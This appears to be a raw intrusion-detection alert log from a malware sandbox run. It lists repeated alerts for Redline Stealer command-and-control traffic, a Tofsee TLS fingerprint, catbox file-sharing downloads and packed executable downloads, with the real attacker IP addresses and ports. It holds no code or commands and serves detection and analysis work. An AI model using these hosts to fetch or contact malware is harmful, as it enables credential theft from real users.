TCP 192.168.56.101:49260 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49199 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49260 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49325 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49325 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49325 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49268 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49268 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49201 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49268 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49268 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49334 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49334 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49201 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49334 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49288 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49334 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49288 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49208 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49288 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49208 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49230 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49208 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49343 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49343 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49299 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49299 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49343 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 77.91.124.31:80 -> 192.168.56.101:49188 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49299 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 77.91.124.31:80 -> 192.168.56.101:49188 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49286 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49231 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49344 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49211 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49344 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49309 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49309 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49344 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49309 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49232 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49232 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49232 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49345 -> 77.91.68.3:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49235 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49235 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49221 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49235 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49345 -> 77.91.68.3:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49238 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49331 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49331 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49331 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49223 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49345 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49248 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49248 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49237 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49237 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49248 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49237 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49239 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49338 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49338 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49239 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49338 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49258 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49258 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49338 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49258 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49340 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49340 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49345 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49262 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49340 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 77.91.68.3:80 -> 192.168.56.101:49345 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49254 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49270 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49359 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49359 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49271 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49359 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49271 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49271 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49360 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49360 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49272 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49256 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49293 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 77.91.68.68:19071 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49259 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49295 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49275 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 77.91.68.3:80 -> 192.168.56.101:49345 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.101:49360 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49363 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49363 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49287 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49287 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49363 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49287 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49375 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49375 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49294 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49375 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49355 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49319 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49355 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49294 -> 108.181.20.35:443 2038639 ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) Potentially Bad Traffic
TCP 192.168.56.101:49319 -> 108.181.20.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
